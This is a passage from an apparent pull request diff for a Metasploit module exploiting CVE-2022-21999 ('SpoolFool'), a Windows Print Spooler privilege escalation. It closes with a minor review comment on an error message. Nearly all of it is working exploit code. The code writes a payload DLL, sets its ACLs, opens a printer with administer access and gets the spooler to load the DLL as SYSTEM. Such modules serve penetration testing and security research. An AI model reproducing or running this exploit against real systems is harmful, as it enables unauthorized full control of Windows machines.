modules/exploits/windows/local/cve_2022_21999_spoolfool_privesc.rb

```diff
@@ -0,0 +1,429 @@
+      8
+    )
+
+    unless ret['return'] == 0
+      fail_with(Failure::UnexpectedReply, 'Failed to get payload security info.')
+    end
+
+    ret = advapi32.BuildExplicitAccessWithNameA(
+      '\x00' * 48,
+      'SYSTEM',
+      session.railgun.const('GENERIC_ALL'),
+      session.railgun.const('GRANT_ACCESS'),
+      session.railgun.const('NO_INHERITANCE')
+    )
+
+    ea_struct = ret['pExplicitAccess']
+    if ea_struct.empty?
+      fail_with(Failure::UnexpectedReply, 'Failed to retrieve EXPLICIT_ACCESS structure.')
+    end
+
+    ret = advapi32.SetEntriesInAclA(1, ea_struct, nil, 8)
+    fail_with(Failure::UnexpectedReply, "Failed to create new ACL: #{ret['GetLastError']}") if ret['return'] != 0
+
+    # need to first access pointer to the new acl
+    # in order to read the acl's header (8 bytes) to determine
+    # size of entire acl structure
+    new_acl_ptr = ret['NewAcl'].unpack('Q').first
+    acl_header = session.railgun.util.memread(new_acl_ptr, 8)
+
+    # https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-acl
+    acl_mems = acl_header.unpack('CCSSS')
+    struct_size = acl_mems&.at(2)
+
+    unless struct_size
+      fail_with(Failure::UnexpectedReply, 'Failed to retrieve size of ACL structure.')
+    end
+
+    acl_struct = session.railgun.util.memread(new_acl_ptr, struct_size)
+    ret = advapi32.SetNamedSecurityInfoA(
+      @payload_path,
+      obj_type,
+      sec_info,
+      nil,
+      nil,
+      acl_struct,
+      nil
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to set permissions on payload.') if ret['return'] != 0
+    print_status('Payload should have read / execute permissions now.')
+  end
+
+  def open_printer
+    print_ptr = session.railgun.util.alloc_and_write_string('RAW')
+    lp_default = [ print_ptr, 0, session.railgun.const('PRINTER_ACCESS_ADMINISTER') ]
+    lp_default_struct = lp_default.pack('QQS')
+
+    winspool.OpenPrinterA(@printer_name, 8, lp_default_struct)
+  end
+
+  def dir_path
+    datastore['PATH']
+  end
+
+  def count
+    datastore['WAIT_TIME']
+  end
+
+  def to_unc(path)
+    path.gsub('C:', '\\\\\localhost\\C$')
+  end
+
+  def write_and_load_dll(handle)
+    payload_name = "#{Rex::Text.rand_text_alpha(5..12)}.dll"
+    payload_data = generate_payload_dll
+    @payload_path = "#{@v4_dir}\\#{payload_name}"
+    register_file_for_cleanup(@payload_path)
+    register_dir_for_cleanup(@v4_dir)
+
+    print_status("Writing payload to #{@payload_path}.")
+    unless write_file(@payload_path, payload_data)
+      fail_with(Failure::UnexpectedReply, 'Failed to write payload.')
+    end
+
+    print_status('Attempting to set permissions for payload.')
+    set_perms_on_payload
+    set_printer_data(handle, 'CopyFiles\\', 'Module', @payload_path)
+  end
+
+  def exploit
+    fail_with(Failure::None, 'Already running as SYSTEM') if is_system?
+
+    unless session.arch == ARCH_X64
+      fail_with(Failure::BadConfig, 'This exploit only supports x64 systems')
```

Comment:
```suggestion
      fail_with(Failure::BadConfig, 'This exploit only supports x64 sessions')
```
Sorry; I know this is super minor.

Reply:
No worries!